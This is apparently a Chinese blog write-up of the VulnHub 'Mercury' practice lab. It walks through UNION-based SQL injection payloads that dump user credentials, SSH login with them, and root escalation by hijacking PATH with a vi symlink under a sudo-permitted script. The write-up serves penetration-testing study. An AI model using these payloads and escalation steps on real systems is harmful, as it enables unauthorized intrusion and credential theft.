xing-vulnhub-mercury靶场#渗透测试

本文描述了一次针对Vulnhub靶场的黑客攻击过程,通过网络配置、SQL注入技巧,获取Mercury靶场的敏感信息,随后利用SSH登录并逐步渗透,最终获取flag的过程。
摘要由CSDN通过智能技术生成

kali:192.168.2.15

靶机:192.168.2.25

  1. 这个靶场需要修改网卡配置,网卡配置修改在网站连接有教程:vulnhub靶场——THE PLANETS: MERCURY_trinity.txt.bak-CSDN博客
  2. netdiscover -r ip //扫描靶场主机ip
  3. namp -p- ip -a //查看靶场的详细信息
  4. 开放8080和22端口号---->http 8080然后找信息,发现404报错有个目录,进入目录,有一个目录存在漏洞----> 1 or 1=1 返回了所有信息----->尝试用1 order by 1来查看返回的字段,发现只有一个字段---->1 union all select database();使用这条sql语句来查询数据库名字---->1 union all select table_name from information_schema.tables where table_schema='mercury';使用sql语句来查询元数据库中mercury中的表名---->1 union all select column_name from information_schema.columns where table_schema='mercury' and table_name='users';查询这个users列中的内容--->1 union select group_concat(id,':',username,':',password) from mercury.users; 查看来自mercury库中users列中的id,username,password的内容

1 union select database(); //查询数据库 结果为mercury可以利用库字来查表 1 union select table_name from information_schema.tables where table_schema='mercury'; //查询表名 结果为facts和users可以利用表名来查列 1 union select column_name from information_schema.columns where table_schema='mercury' and table_name='users'; //查看列名 结果为id,username,password可以直接查看这三个的内容,上一条语句也可以直接不带table_schema='mercury'这段语句好像 1 union group_concat(id,':',username,':',password) from mercury.users; //查询内容 结果为如下 1:john:johnny1987 2:laura:lovemykids111 3:sam:lovemybeer111 4:webmaster:mercuryisthesizeof0.056Earths 最后依据联合查询语句意为从mercury这个库中的users这个列中来提取id,username,password的数据内容

猜测可以使用ssh进行登录然后在继续渗透 于是挨个试只有最后一个可以登录使用webmaster:mercuryisthesizeof0.056Earths ssh webmaster@192.168.2.25 //进行远程,然后输入密码 远程登陆成功后在user_flag.txt看到第一个flag,然后ls -l看到一个mercury_proj的目录进去看看 有一个notes.txt文件 cat notes.txt 发现一个base64编码,于是使用kali解码: echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d //加-d为解码,默认不加为编码 结果为mercurymeandiameteris4880km感觉是个密码 su linuxmaster //登录linuxmaster使用上一行的密码可以登录 然后在sudo -l使用密码mercurymeandiameteris4880km //sudo -l 命令用于列出用户可以执行的 sudo 命令 ls -l /usr/bin/check_syslog.sh //查看这个shell cat /usr/bin/check_syslog.sh 3.whereis vi //用于查找vi编辑器的二进制文件源代码,例如vi编辑器安装在/usr/bin/目录下那么执行whereis vi会返回该目录路径 4.ls -la //代表列出权限,a代表列出所有文件目录,包括点开头的隐藏文件 5.ln -s /usr/bin/vi tail 的意思是:创建一个名为 tail 的符号链接,该链接指向 /usr/bin/vi 文件。 换句话说,当你通过 tail 命令访问时,实际上你是在访问 /usr/bin/vi文件---这样做在当前目录下./tail就相当于执行了vi命令。 续上命令在执行export PATH=/home/linuxmaster:$PATH执行这条命令之后再次目录下使用tail就相当于使用vi命令了 sudo --preserve-env=PATH /usr/bin/check_syslog.sh //sudo以保留环境变量PATH的方式执行 /usr/bin/check syslog.sh 然后输入:!/bin/bash可以直接切换到root 然后cd \ cat root_flag.txt //结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值